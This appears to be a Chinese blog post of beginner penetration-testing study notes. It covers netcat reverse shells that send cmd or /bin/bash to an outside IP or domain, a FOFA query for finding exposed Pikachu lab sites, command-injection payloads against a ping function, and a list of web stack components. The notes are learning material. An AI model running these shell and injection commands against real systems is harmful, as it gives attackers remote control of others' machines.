nc -e cmd 47.12.112.215 5577
-e:将本机的cmd权限移交到这个ip地址的5577端口
nc -lvvp 5577
监听本机端口5577
内网可以给到xiaodi8,xiaodi8不能给到内网
解决方法:路由器端口映射
ncat www.xiaodi8.com 5566 -e /bin/bash
将linux的bin/bash类似于windows的cmd窗口权限回弹到www.xiaodi.com的5566端口
nc -lvvp 5566
长向反向连接看以什么为参照物,一般是以渗透主机为标准
自己出去是正向连接,别人连接自己是反向连接
fofa.so直接搜索:
“pikachu” && country=“CN” && title==“Get the pikachu”
RCE----------exec “ping”
将nc上传到它的服务器上头去,然后再利用nc反弹cmd
127.0.0.1 & ipconfig
127.0.0.1 & nc -e cmd 0.0.0.0 5566
nc -lvvp 5566
web应用环境架构类:
理解不同 web应用组成角色功能架构
开发语言、程序源码、中间件容器、数据库类型、服务器操作系统、第三方软件等等
开发语言:asp,php,aspx,jsp,java,python,ruby,go,html,javascript等
程序源码:根据开发语言分类;应用类型分类;开源CMS分类;开发框架分类等中间件容器:IIS,Apache,Nginx,Tomcat,Weblogic,Jboos,glasshfish等
数据库类型:Access,Mysql,Mssql,Oracle,db2,Sybase,Redis,MongoDB等
服务器操作系统:windows系列,Linux系列,Mac系列
第三方软件:phpmyadmin,vs-ftpd,VNC,ELK,Openssh等
Day1 xiaodi学习篇
于 2023-01-21 23:40:55 首次发布